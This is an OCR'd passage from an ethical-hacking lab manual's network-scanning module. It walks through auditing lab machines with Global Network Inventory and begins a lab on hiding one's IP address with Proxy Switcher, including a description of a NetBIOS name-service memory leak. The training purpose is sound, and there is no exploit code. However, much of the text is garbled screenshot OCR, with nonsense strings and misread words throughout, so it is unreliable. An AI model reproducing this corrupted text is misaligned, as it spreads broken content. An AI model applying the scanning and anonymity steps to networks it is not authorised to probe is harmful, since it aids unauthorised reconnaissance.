FIGURE 11.3 Global Network Inventory Maui Window
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 189
M odule 03 - S can n in g N e tw o rk s
FIGURE 11.4: Windows 2008 Virtual Machine
6 . N o w s w itc h b a c k to W in d o w s S e rv e r 2 0 1 2 m a c h in e , a n d a n e w A u d i t
W iz a rd w in d o w w ill a p p e a r . C lic k Next (o r i n d ie to o lb a r s e le c t Scan ta b
a n d c lic k Launch audit wizard).
□ Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices
VIEWS SCAN R E S U L TS ,
/ N C L U D / N C HISTORIC R E S U L T S FOR ALL SCANS,
INDIVIDUAL M A CHINES,
OK7 . S e le c t IP range s c a n a n d t h e n c lick Next in d ie Audit Scan Mode w iz a rd .
SELECTED NUMBER OF ADDRESSES
New Audit Wizard
Welcome to the New Audit Wizard
Ths wizard will guide you through the process of creating a new inventory audit.
To continue, click Next.
c Back Next > Cancel
FIGURE 11.5: Global Network Inventory new audit wizard
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 190
M odule 03 - S can n in g N e tw o rk s
New Audit Wizard
A u d it S can M odeTo start a new audfc scan you must choose the scenario that best fits how you w i I s ■ ( ^ Mbe using this scan.
O Single address scanChoose this mode i you want to audit a single computer
(•) IP range scanChoose this mode i you want to audit a group of computers wttwn a sr>gle IP range
O Domain scanChoose this mode i you want to audit computers that are part of the same doma»1(s)
0 Host file scanChoose this mode to audt computers specified in the host file The most commonscenario is to aud t a group of computers without auditing an IP range or a domain
O Export audit agentChoose this mode i you want to audit computers using a domain login script.An audit agent vwi be exported to a shared directory. It can later be used in thedomain loain scnoi.
To continue, c ic k Next.
1 < Back N ® d> Cancel
______
FIGURE 11.6: Global Network Inventory Audit Scan Mode
8. S e t a i l IP range s c a n a n d th e n c lic k Next in d ie IP Range Scan w iz a rd .
9 . 111 d ie Authentication Settings w iz a rd , se le c t Connect as a n d fill th e
r e s p e c te d c re d e n tia ls o f y o u r Windows Server 2008 Virtual Machine, a n d
c lic k Next.
Q Fully customizable layouts and color schemes on all views and reports
Export data to HTML, XML, Microsoft Excel, and text formats
Licenses are network- based rather than user- based. In addition, extra licenses to cover additional addresses can be purchased at any time if required
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 191
M odule 03 - S can n in g N e tw o rk s
£□ The program comes with dozens of customizable reports. New reports can be easily added through the user interface
10. L iv e d ie s e t t in g s a s d e f a u l t a n d c lic k Finish to c o m p le te d ie w iz a rd .
(—7 Ability to generate reports on schedule after every scan, daily, weekly, or monthly
(§₪ To configure reports choose Reports | Configure reports from the main menu and select a report from a tree control on a left. Each report can be configured independently
11. I t d isp la y s d ie Scanning progress i n d ie Scan progress w in d o w .
New Audit Wizard
Completing the New Audit Wizard
You are ready to start a new IP range scan You can set the following options for this scan:
@ Do not record unavailable nodes @ Open scan progress dialog when scan starts
Rescan nodes that have been successfJy scanned
Rescan, but no more than once a day
To complete this wizard, d ick Finish.
< Back finah Cancel
FIGURE 11.9: Global Network Inventory final Audit wizard
New Audit Wizard
Authentication SettingsSpecify the authentication settings to use to connect to a remote computer
O Connect as cxrrertiy logged on user
( • ) Connect as
Domain \ User name a d ^ ir iS '3 •׳-)
Password ...........'
To continue, dck Next
< Back Nert > Caned
FIGURE 11.8 Global Network Inventory Authentication settings
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 192
M odule 03 - S can n in g N e tw o rk s
Q Filtering is a quick way to find a subset of data within a dataset. A filtered gnd displays only the nodes that meet the criteria you specified for a column(s)
12. A f te r c o m p le t io n , scanning results c a n b e v ie w e d a s s h o w n i n th e
fo l lo w in g fig u re .
0 Global Network Inventory lets you change grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column
FIGURE 11.11: Global Network Inventory result window
13. N o w se le c t Windows Server 2008 m a c h in e f r o m v ie w re s u lts to v ie w
in d iv id u a l re su lts .
Globa' Network Inventory - Unregistered
Pf i e V iew Stan Tools Reports Help
i'v - □]E r BlBWtalri~»EI] u *י ?a Logged or \ 5׳1׳ ^ ;NotBlOS | A Shanes JW liter gr-t n
Carr ie♦ s>«en Q PiocMMn ^ Man beard Q Memory mu Memory deuces H Detflcp :> ך rcmnaon ] Syttern *tat» |A) Hotftxet סז«ר
A- !tanrnre 0$:־»1מ#ויוי Icgralriskt ( a I w a w rjqr Hrrfert Networt :.-ז־ . mrrrScar M W i ^ ( p#rat:r.r |Q g !•rwit
Verrfa ' 03 Mams ־» FtoccJia ... *־ Coimtert״־
| Tircitamp ..MAC A ־י HoalN... ▼J Status ־י
d Doran WORKGROUP [COUNT-2)IP Add© «: ‘ 0.0 0.4 (C0U NT-11
Tn«to ro :& 22/2012 3 36:49PM (COUNT-1)Coroj.. |v/N «■־ LLV05(| Succcii |C0-15 5DQ01 Micro:)*Ca V irccw ; Server |
JIPAdde«.10.a0.7|CO UNT1־ |1 Trrcj»a36.30 3 2012 ״3. ׳&22׳< PM (C0UNT «1 ]
•» C«־K>j..[v/N€3SMn|Succ0M |D4־BE־D3־C'|R«rtek |lnts(Rl Co!e(fM' Serial; H2D2<
Oisplaye^roiJp^J^roups
[ r 1RtJu ltJfT iitorydept^LiJtuariortachaM re^s
Tow ?Henr(t)
Niirt- MpIa■ addresses
$ WORKGROUP ־:■I 10.0JX7 (WIN-D39... ■m 1a0JX־« (W1N-ULV8...
i J Scan progress
מ Address Name Percent Tmestamp 1 A0 10.0.0.2 — E ! % 06/22/1215 38:31 10.0.0.3 E * 08/22/1215:36:232 10.0.0.4 W1N-ULY858KHQIP 852 08/22/1215:36:253 ו 0.0.0.5 E ! * 08/22/1215:36:23 =4 ו 0.0 06 AOMINPC 9 2*4 | 06/22/1215:36:235 10.0.0.7 WIN-039MR5HL9E4 92* | 06/22/1215:36:226 10.0.08 ! z z 08/22/1215:36:237 10.009 ^ z _ 08/22/1215:36 248 100010
W06/22/1215:36 24
9 100011 E * 08/22/1215:36:2410 10.0.0.12 ' E * 08/22/1215:36:24וו 100013 ' E * 08/22/1215:36:24ו2 10.0.014 I E * 06/22/1215:36:24
rtn m ר
@ Open this dialog sdien scan starts Elapsed time: 0 min 6 sec
@ Close this dialog when scan completes Scanned nodes: 0/24
@ D on l display completed scans
. Sl0p _ Cl°” 1/ FIGURE 11.10: Global Network Inventory Scanning Progress
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 193
M odule 03 - S can n in g N e tw o rk s
l - l ° W *Global Network Inventory ־ UniegisleredM e view scan Tool( Report < Help
in - %-u110|s^Pig ¥ B|Q|^|a|D|B-B # ® , Looca d!s\s -־ מ-י'■ Z»: ־ ל•־- : * B ' ״ tens ■£־ Netr*of. adapter:
Port arredoR | System dots | Hot fxes 3e;jr**• certer | 3 ■ Startup ■׳ Desktoo^ Orvces 3 NetBIOS | Shores L » ^cvps ^ Lbcre | J Logged crj| Computer yysten Q Po;c3:cn> '•';־׳י bosd ^ Morer) B8
Scan •unrary §, ^ 0 tn3:,־:.: ten ,ft K3:. ׳'
Type ״ HoitN » SMtu: י MAC A * Vanda » CJS * Proceisci w Cornu w r »
J Duiein * o׳ ^ e n a jp COUNT-11JIPAddrew 10XL0.7 (COUNT =1 ן
TncUaro: G/22/2012 3:36:38 PM (CO UN T -1)■» C5T0J. jV/N 039MR Succe« |D4־BE D9C|Rcakk ntsfR] Corc(TM' Send: H202!
t* ss 3 □ 8N*rrcB יי AH addresses י
B- <* WORKGROUP*rfcT1DC.07tV/1N-D Tn
מ‘ •« C J4 ‘fw¥-ULY3״‘
^esufc^jto^jegt^oj^ca^o^oc^cdfcjRe»dyFIGURE 11.12 Global Network Inventory Individual machine results
14. T h e Scan Summary s e c t io n g iv e s y o u a b r i e f s u m m a r y o f d ie m a c h in e s th a t
h a v e b e e n s c a n n e d
1- ־ rGlobal Network Inventory ־ Unregistered
1 -sa a w-fie VHvr Scan Tools Reports Melo
*5 'tin>lcr5 k Mcritofj | {jjjj Logical dska ^ CX>k &tszi mo "Sntcn | j* Networx oocpteo כ נ
yw cto i ( j S eton dot• Hoi focce Q Socuty ccrto■ J Startup | H Dcck!op ^Sn Dovcoi [#J NoifcKJS | ^ Sharoe U w group( ^ U*«ra LoggoCon
Menoiy cevicee י* J -: Tp-M< tyrte-r Q *5 י :■ :•;ore ^ Mantcsrdervces^ | !=■־» p Q :.,־■=!;•׳! |l#| Scan anrm y j ®] uperatmg
□ ]e t 1▼ a x
Hcs4 H.. - Status ־״ MAC A... ״־■ barrio- ~ OSKsrw ״■Corrmert ״י ..Prco3350r ־י ־l־.JLrJ ־- d׳ t 'o m a r : \v t R r . i i - O U
lrvel(R)Core(TM; Seiial H?ר?
^ P 3 d * e « : IC .0.0 : CQUNT=1J _____________________________
Id Tn rg ra« p B /22;2P lZ3-36 ^ P M [C D U H r = l l
| ;*» Ccnpu |WM-039VIR|S1jrowt rU-BF-D»C:| R^rri
em(s)ו rTotal 4 ־r1 ־1
n 1* a □ * aNam•י - ■! A 1 addrestM
S f״ WORKGROUPlj1CM7iN-D l־.־.:■I lOiXOi’ N-ULYC"
^c lt iiitorydepthj
FIGURE 11.13: Global Inventory Scan Summary tab
15. T h e Bios s e c t io n g iv e s d e ta ils o f B io s se ttin g s .
& * Global Network Inventory grid color scheme is completely customizable.You can change Global Network Inventory colors by selecting Tools | Grid colors from main menu and changing colors
To configure םresults history level choose Scan | Results history level from the main menu and set the desired history level
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 194
M odule 03 - S can n in g N e tw o rk s
a Scan only items that you need by customizing scan elements
16. T l ie Memory ta b s u m m a r iz e s d ie m e m o r y in y o u r s c a n n e d m a c h in e .
£□ E-mail address - Specifies the e- mail address that people should use when sending e- mail to you at this account. The e- mail address must be in the format name(ftcompany— for example, someone@mycom pany.com
17. I n d ie NetBIOS s e c t io n , c o m p le te d e ta ils c a n b e v ie w e d .
Global Network Inventory - UnregisteredFie View Scan Tools Reports help
* H ח • e V iB lB & lm lH F i- ii i ®- -•:!־־־ •> Network a d ^ c n !
Q 1 י«ת0ו׳*חווו | 'J. b*r/1r*c■t•5 ׳■ startup | k י««»ים>
%- I Iwt orMwitMV f l w f «
■ » \M 0© coofirokn L • Mentors | g j Logical daks t M Oak ± n
* I j0> tf| Operating S,׳d-•"J* y - . ־ ■־ »ct*noct •■־ ״ti׳׳■(׳ fff
D»ve*t [#] N*BI0S | I Shw*1 p UMfcro״j
Td a lP h ^ c d v e n w x / .M a - S a la b le H-yrea... - Total vfcuaL. ~ A v a to e V rt ja . . . - lo ta ...- - ftvalable..■-
d[D V .C R t5 F 0 U P [C rM J N '= ]J
Hcsr Marre 3 9 ^ ^ MF5HL9E4־ (C0U!\iT=1)
J ־ hres-aap f t 2 ׳22׳/ C12 3:36 3B PM (COUNT־ ) |3317
7 o b i 1 itsu ;1
v w w r» u R < ▼ a x
* * s « a □ מ «N a m *
H % A ll *ddtesse*
4 # WORKGROUP
w *■־ p y ־■m I0.C.0.4 (W IN -U LY8...
O iip la /e d group: All groupsResults history depth: Last scan for each address
FIGURE 11.15: Global Network Inventory Memory tab
־ x ז ' ° '1Global Network Inventory ־ Unregistered
El & ,to •״ H5!H i ]^ k rr- q■ . ״ . .7: ■> f,7. . •^ד־ Por. -annccfcrc Q System dots Hct fixes ^ Srcurti־ cater 3" Startup ■ Desktop
Derive* 2 MdBIOS J . Shares jscr j a n )£• 1555 | ^ Lccocd orP Pocessots Mar :>c*od Mcrcry >*י Memory devices
J ^ Opcra.i-10 Cvs.or Q fc l יי rent
f i t view 5 tan Tools Report( Help
ז ־ 1 SJ1 '’־□ E T? |5|□icwresufts ׳ייי X
S c a i aum anr
1 01*1 ו
Q 'tp lt /« d group: All grouptR«t uttt h ittory d«pth: Latt t o n for tacft a f lc r t t;
* 8 9 £ □ J 5
N a rrc _
H * P All addresses
B 5 ‘ WORKGROUP■fc f1M0T'(\vi‘N-639.7 ־{ ■ ...VIN-IJI Y8<נ*ר 10.0.1
»U»d/FIGURE 11.14: Global Network Inventory Bios summary tab
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 195
M odule 03 - S can n in g N e tw o rk s
Message subject - Type the Subject of your message. Global Network Inventory cannot post a message that does not contain a subject
FIGURE 11:16: Global Network Inventory NetBIOS tab
18. T h e User Groups ta b s h o w s u s e r a c c o u n t d e ta ils w i th d ie w o r k g ro u p .
□ Name - Specifies
the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages
19. T h e Logged on t a b s h o w s d e ta i le d lo g g e d o n d e ta i ls o f d ie m a c h in e .
Unregistered ־ IG'obel Network Inventory ־ 1 םF ie View Scan Tools Reports Help
[□ E T |E p |g |B ) |• ־ IB; * a ■aMemory מ Mcntcry cfcvccs odatfco ,־Prrtco •> Netted ■י
n -nvrormont cr J Ctoitup ■ Deaktoo A- _bera I, Lojj=d or
2 Conjuta srrf— Q Prccc350ra | Mar board I J) jj] Opcralinq Cyslcrr Q כ Locicoldbks ^ D»sdr>c*m #> CIO רה k Vent :־ccc •I־«
Q ij0 «• ^ Devicc: It#] Net Cl DC י 7 Shares | J? Jxryw
H ostN cne ־/ / * -D39-4R5HL9E4(COUNT-51
z i ' rrescanp: E /22 '20 12 3:36:38 FM ( COUN5- ל ]
z i G io j j ^ r w 'is ’rafcr: (C0UNT=1)
/ / ! S 0 CEN R 5HL3E4'>Adrim$tratoi U5cr occcurt
z i Gr^JD: C KttK ited CUM Useis (COUN I - 1 1
WlS-O394R5HL3E4\Ad1rini?trdt01 U ;e 1 accourt
_J G r»^o: Gue:»; COUNT-1)
Jk• Ul f l r<03־E MR 5 H L g 5 \ 4 ussl־ U8#f accourt
d C 1 0 * . I IS J U S f iS COUNT■!)% NT >־ F\lZcV^cpcrlSc«vor VV«# krcv׳n gtcup oooounl
z i G ro w Pfftavure* 1 rg U n i t (COUNT ■1)
TU0I5 i cn|i|
HI as a □ *3 $Narr«
*i* All address•:- i f WORKGROUP
? S i i i l L»• iaiJiw N S:׳
Displayed group; All qioupaRcsuMts history depth: Lost scan foi each ooaes!Rsad/
FIGURE 11.17: Global Network Inventory User groups section
; - ! o rGlobal Network Inventory ־ UnregisteredF ie v iew S o n Tools Reports Help
! □ i s ? i B i a i a s p 5 ! ■ ! a & » B
Mencry ®S Memory device(
4• Scan 3JTTmarv ♦ S) hitdted «yt *sre Cl nvmmgrt |;& Servicesד Port conrwctre Cl Qf S*drt/M׳t«r Startup 3ל." | ■ Destdop
logged on
zJ Harr l l i n*033*| , ׳ י\ vF5H. =)E 4 (COLNT=3)Tir^HatF B/22;2C12 3:3ft 38 FM (COUN T 3־)*[V/K-039M Ro- LSE4<0>aJ> Lmqj? Woikstatcr ServiceX WK C •SM R LSE4<Ox20S־ Unque Fie Server Service3 WORKGROUP <0x00> Group Domain Name
Toid3i.enld
t»<pt»/»d g roup: All g roupsRemits history depth ia<t scan ret earn naorett
V*y* results
Narre- & I addresses
B-fi־ WORKGROUP1C.0.C.’ (WIN-D39. 19 1 0 ^ f^ U LY «::
Rea fly
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 196
M odule 03 - S can n in g N e tw o rk s
& Port ־ Specifies the port number you connect to on your outgoing e- mail (SMTP) server. This port number is usually25.
2 0 . T h e Port connectors s e c t io n s h o w s p o r t s c o n n e c t e d i n d ie n e tw o rk .
Outgoing mail (SMTP) ־ Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages
2 1 . T h e Service s e c t io n g iv e d ie d e ta i ls o f d ie s e rv ic e s in s ta l le d i n d ie m a c h in e .
Globa' Network Inventory - UnregisteredSTScan Toolt Report( HelpFile
1S1 User* | Logged onmay Memory devus
:Networx 0d3?1cr ׳־£•Q fcrvronm nt | S«m :«
a Startup !r j Desktop
NetBIOS £ Sharps J i. Lften Fiocessois ^ M<ji1 b0 f J
L . l-bntcrj £ Logcal disks D:* WOS | S ) 0p«1fcrg Syr«r ן—
JO ^ hrr י; c jn c u r r r jr ,
Port connectors
Dorian. V/D^KOROU? (C0UNT=25IJ he*• Hare: t*׳T. D39MR5HLJ3E4(COUNT-25)J ttaro: &'22/2D12 33638 PM (COUNT =26)*״■ 1
DH״ 73’ Serial Por 1S55CA Conpattle D69־.Maleז7«ככ Keyt»01d Port FS/2
’7 ODH M oucc Pori FS/2’703H USB &m> 51 bust7o0h USB’70311 UCD *CCOH.blM,703H USB Aco#st.but
ז alal 25 Atris
Disj ayecl arouo; All aroupsFes jts nistory deptn: Last scan foi ecdi cCtite><
vipwr^ui: w a xa ש b #
NameH- All SddtKteS
f r £* WORKGROUP■» F ll^ T fMM־״Di ־9־־־־־■ 0 ""ULY8־N׳fW׳W).»־ 10
FIGURE 11.19: Global Network Inventory Port connectors tab
״ ■ ״ ■1 - 1Globa! Network Inventory ־ UnregisteredMe view 5<ar tools Reports Help
§3-□Is ? Hc1®e/ -•1a & ׳״J a וגב id syiefi Q Processors £ Main beard ^ Nenoiy w Memory de/ces \ ^ L> j1d j s v j Q Di:-•. J . £■ Net ■-.m Scansuranaiy ^ BICS |.§) Ooefatro System l£־) totaled software | ( | Environment Services |
Port comedo* Q } System slots | Hotfixes ^ Sea it) eerier _J■ 3.<n:u,__HL_2s5tlSB_JC־־r ■ r . '* {3 0 S 2' Sfia'es > U stty. Users | j> Logged or J
Ho aNo k WH-033NR5HL3E4 (COUNTS
1 NT SERV.CE >M sDisServerl 10f H” SERVCE'MSSQLFDLounchct*, N־ S£RVC£\MS$QLSERVERf N־ SERVCE'MSSQLSer/eiOLAPSeiviee* , N־ SERVCE'RcportScrva£ \AH D39MREHL9E4\A<irnriatral:or 38/22/12 09:01:20
Oowove rou lUroupsResults fcitory depth lost icon lor toch address
V«w resuKs
*2 » י ־־ □ mN e irc _
E % All addresses S f WORKGROUP
;1dbix7"(wi׳N-D3g... ;■ '160.04 (WIN-ULY8...
Rod/FIGURE 11.18: Global Network Inventory Lowed on Section
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 197
M odule 03 - S can n in g N e tw o rk s
R = rGloba! Network Inventory ־ UnregisteredMe view 5rar Tools Reports Help
־ - בס[*$ ־® H e p H B]®e| •-•Eg & ׳״NetBOS
Dp f Devices et30S | Shares £ User croups Jsers | Loaaedor
g Q C i Main board ^ Memory n Msrrcryde/cesPort cornedas Q f System slots | Hotfixes ^ Secut) center £ Startup ■ Desktoo |
*i ' jjjj — "»| u n ic i t | S c r r iso :13 ויין (i g ״c t iu Svtte .1• 3 0גי M
-N»♦z i Domr* V»ORC13RO UP |CDUMI«l4/)
_!J Hcs׳ *sLan WIM^»IR5HL9E4(COUNT■!47|z i rr^anp 3/22!20H 3 3&38FM [COUNT =147)
. Ldcte A cxb 2t U pcare Ser/ce
, £ p f teanon E>o=r1enee
41loma1׳e
Manual
R ufM rg
R u m rg
:־־ 'P?!1g-an Filei [vf־fc)\Comrmn Fite'iAdobi
C־ vV.mdowt\system32\svehott eye •k netsv
. fcanon Host Helper Service Automatic R j 'i ' i r g C «V.»Klowt\^1srern32\fivch0ftexe •k apphr^ A p p fc a n o n Identtji
A pflcanon Intonation
Manual
Manual
S tc ffe d
R im r g
C־*\fcmdow1\svstem32\svc*r0ft.exe •k Local
C »V.m<tem(t\sysiern32\svcf10fr.exe •k netsv
. Apffcrariofi Layer 5 areway Service Manual S iq^ ied C ,V,mdowt\S3i5tem32Ulg >־»=(Apffcarion Manarjenenr Manual C »\Mn<low?\system32Nsvchotr exe •k ne tw
10taH47 toart :J
Oowove rou lUroupsResults fcitory depth lost icon lor to<h address
View re<ufts
*1 *9 2 □ mN e ir c _E % All addresses
S f W O RKG RO UPy־ 1• 'a a ’7 iw i‘N-D38’״" ’ ;■ '160.04 (WIN-ULY8...
Rod/FIGURE 11J20: Global Network Inventory Services Section
2 2 . T h e Network Adapters s e c t io n s h o w s d ie Adapter IP a n d Adapter type.
S To create a new custom report that includes more than one scan element, click choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize settings as desired, and click the OK button
Unregistered ־ 1Global Network Inventory־
Q 'll ׳״> & Reports Help
1 t*ga• □ e vFie view Stan Tools
I* ״^ D c *c « [# J NetBIOS | ^ SK3X3 4■ U3cr<rouF3 JL• Uacn ^ Looocdon j| Conputer ו*€<־ת Q Prooeaaora Mom boane f j j Memory B?1 Memory devicesy Tort c«medoo Q System alots | Hotfixes ^ Ccc^rfy eerier j * Startup | H Desktop H Scan ajrrrcrv ^ 80S |׳jgj] Cporatrj Syotom IrwUkd •oftwuo B Envtrontnonrt I ׳J, Sorvcooh■ v®00 1- ?מ | v
| E therrct QIC | N 0- Tinettarp: 1rj2>233 6 : 3 3 FM (COUNT-11 ־ 2 3 ך g • W w iih w lE fo . |P4:BE:D9:C|100.D7 l2552EE.2g|1H.01 [vicreolt
I otall ren^j
'/cwrcsuR; ▼ ל X
r-l □ E $Narr<B V l All addr»<«#e
y~*£ WORKGROUP
■- m o״M (w n ' u’l^ " . " ’
^esujt^jjto^jepth^as^a^o^seJ ddrts^Rea
& A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password
FIGURE 11.21: Global Network Inventory Network Adapter tab
L a b A n a ly s is
D o c u m e n t all d ie I P a d d re s s e s , o p e n p o r t s a n d r u n n in g a p p lic a tio n s , a n d p r o to c o ls
y o u d is c o v e re d d u r in g d ie lab .
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 198
M odule 03 - S can n in g N e tw o rk s
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
I P S c a n R a n g e : 1 0 .0 .0 .1 — 1 0 .0 .0 .5 0
S c a n n e d I P A d d r e s s : 1 0 .0 .0 .7 ,1 0 .0 .0 .4
R e s u l t :
■ S c a n s u m m a r y
G l o b a l N e t w o r k■ B io s
I n v e n t o r y ■ M e m o r y
■ N e t B I O S
■ U s e r G r o u p
■ L o g g e d O n
■ P o r t c o n n e c t o r
■ S e rv ic e s
■ N e t w o r k A d a p t e r
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. C a n G lo b a l N e t w o r k I n v e n t o r y a u d i t r e m o t e c o m p u t e r s a n d n e t w o r k
a p p l i a n c e s , a n d i f y e s , h o w ?
2 . H o w c a n y o u e x p o r t th e G lo b a l N e t w o r k a g e n t t o a s h a r e d n e tw o r k
d i r e c to r y ?
I n t e r n e t C o n n e c t i o n R e q u i r e d
□ Yes 0 N o
Platform Supported
0 Classroom 0 iL a b s
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 199
M odule 03 - S can n in g N e tw o rk s
A nonym ous B row sing using Proxy S w itch erProxy Switcher allowsyou to automatically execute actions; based on the detected netnork connection.
L a b S c e n a r i o
111 t h e p r e v i o u s la b , y o u g a t h e r e d i n f o r m a t i o n l i k e s c a n s u m m a r y , N e t B I O S
d e t a i l s , s e r v ic e s r u n n i n g o n a c o m p u t e r , e t c . u s in g G l o b a l N e t w o r k I n v e n t o r y .
N e t B I O S p r o v i d e s p r o g r a m s w i t h a u n i f o r m s e t o f c o m m a n d s f o r r e q u e s t in g
d i e l o w e r - l e v e l s e r v ic e s d i a t d i e p r o g r a m s m u s t h a v e t o m a n a g e n a m e s , c o n d u c t
s e s s io n s , a n d s e n d d a t a g r a m s b e t w e e n n o d e s o n a n e t w o r k . V u l n e r a b i l i t y l ia s
b e e n i d e n t i f i e d i n M i c r o s o f t W i n d o w s , w h i c h i n v o l v e s o n e o f t h e N e t B I O S
o v e r T C P / I P ( N e t B T ) s e r v ic e s , t h e N e t B I O S N a m e S e r v e r ( N B N S ) . W i t h d i i s
s e r v ic e , t h e a t t a c k e r c a n f i n d a c o m p u t e r ’ s I P a d d r e s s b y u s in g i t s N e t B I O S
n a m e , a n d v i c e v e r s a . T h e r e s p o n s e t o a N e t B T n a m e s e r v ic e q u e r y m a y c o n t a i n
r a n d o m d a ta f r o m t h e d e s t i n a t i o n c o m p u t e r ’ s m e m o r y ; a n a t t a c k e r c o u ld s e e k
t o e x p l o i t t h i s v u l n e r a b i l i t y b y s e n d in g t h e d e s t i n a t i o n c o m p u t e r a N e t B T n a m e
s e r v ic e q u e r y a n d t h e n l o o k i n g c a r e f u l l y a t t h e r e s p o n s e t o d e t e r m in e w h e t h e r
a n y r a n d o m d a ta f r o m t h a t c o m p u t e r 's m e m o r y is i n c lu d e d .
A s a n e x p e r t p e n e t r a t i o n t e s t e r , y o u s h o u ld f o l l o w t y p i c a l s e c u r i t y p r a c t i c e s , t o
b l o c k s u c h I n t e r n e t - b a s e d a t t a c k s b l o c k t h e p o r t 1 3 7 U s e r D a t a g r a m P r o t o c o l
( U D P ) a t t h e f i r e w a l l . Y o u m u s t a ls o u n d e r s t a n d h o w n e t w o r k s a r e s c a n n e d
u s in g P r o x y S w i t c h e r .
L a b O b j e c t i v e s
T h i s l a b w i l l s h o w y o u h o w n e t w o r k s c a n b e s c a n n e d a n d h o w t o u s e P r o x y
S w i t c h e r . I t w i l l t e a c h y o u h o w to :
■ H i d e y o u r I P a d d r e s s f r o m t h e w e b s i t e s y o u v i s i t
■ P r o x y s e r v e r s w i t c h i n g f o r i m p r o v e d a n o n y m o u s s u r f i n g
I C O N K E Y
p = 7 V a lu a b le
in f o r m a t io n
T e s t y o u r
k n o w le d g e
w W e b e x e rc is e
Q W o r k b o o k r e v ie w
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 200
M odule 03 - S can n in g N e tw o rk s
L a b E n v i r o n m e n t
T o c a n y o u t t h e l a b , y o u n e e d :
■ P r o x y S w i t c h e r is lo c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Sw itcher
■ Y o u c a n a ls o d o w n l o a d t h e la t e s t v e r s io n o f P r o x y W o r k b e n c h f r o m
t h i s l i n k h t t p : / / w w w . p r o x y s w i t c h e r . c o m /
■ I f y o u d e c id e t o d o w n l o a d t h e l a t e s t v e r s io n , t h e n s c r e e n s h o t s s h o w n i n
t h e la b m i g h t d i f f e r
■ A c o m p u t e r r u n n i n g Windows Server 2012
■ A w e b b r o w s e r w i t h I n t e r n e t a c c e s s
■ F o l l o w W iz a r d - d r i v e n in s t a l l a t i o n s te p s t o in s t a l l Proxy Sw itcher
■ A d m i n i s t r a t i v e p r iv i le g e s t o r u n t o o ls
L a b D u r a t i o n
T im e : 1 5 M in u t e s
O v e r v i e w o f P r o x y S w i t c h e r
P r o x y S w i t c h e r a l lo w s y o u t o a u t o m a t ic a l l y e x e c u te a c t io n s , b a s e d o n t h e d e te c te d
n e t w o r k c o n n e c t io n . A s t h e n a m e in d ic a te s , P r o x y S w i t c h e r c o m e s w i t h s o m e
d e f a u l t a c t io n s , f o r e x a m p le , s e t t in g p r o x y s e t t in g s f o r I n t e r n e t E x p l o r e r , F i r e f o x ,
a n d O p e r a .
L a b T a s k s
1. I n s t a l l P r o x y W o r k b e n c h i n Windows Server 2012 ( H o s t M a c h in e )
2 . P r o x y S w i t c h e r is l o c a t e d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Sw itcher
3 . F o l l o w t h e w i z a r d - d r i v e n i n s t a l l a t i o n s te p s a n d i n s t a l l i t i n a l l p l a t f o r m s
o f t h e Windows operating system.
4 . T h i s la b w i l l w o r k i n t h e C E H la b e n v i r o n m e n t - o n Windows Server 2012, W indows Server 2008י a n d Windows 7
5 . O p e n t h e F i r e f o x b r o w s e r i n y o u r Windows Server 2012, g o t o Tools, a n d
c l i c k Options i n d ie m e n u b a r .
2 " Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 03 Scanning Networks
C l Autom atic change of proxy configurations (or any other action) based on netw ork inform ation
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 201
M odule 03 - S can n in g N e tw o rk s
Google Moiillo Fitefox
fi *e •!1• -■cc9u
Documents Calendar Mote •
Sign n
colt | HtJp
Qownloatfs CW-Imoderns cm *v״«*AS<* UpS^K.Web DeveloperPage Info
Cle«r Recent Ustsr. 01+“ Sh1ft*IW
♦You Search Images
G o o g le
Gocgie Search I'm feeling Lucky
•Google Aboul Google Google comA6.««t>11ng Piogammei Business SolUion* P iracy t Te
F IG U R E 121: F ire fo x options tab
6 . G o t o d ie Advanced p r o f i l e i n d ie Options w iz a r d o f F i r e f o x , a n d s e le c t
Network t a b , a n d d i e n c l i c k Settings.Options
ם & §י % p * k 3General Tabs Content Applications Privacy Secuiity S>nc Advanced
| S g tn g i.
Clear Now
Clear Nov/
Exceptions..
General | MetworV j Update | Encryption j Connection
Configure how h refoi connects to the Internet
Cached Web Content
Your vreb content cache >s currently using 8.7 M B of disk space
I I Override automate cache management
Limit cache to | 1024-9] MB of space
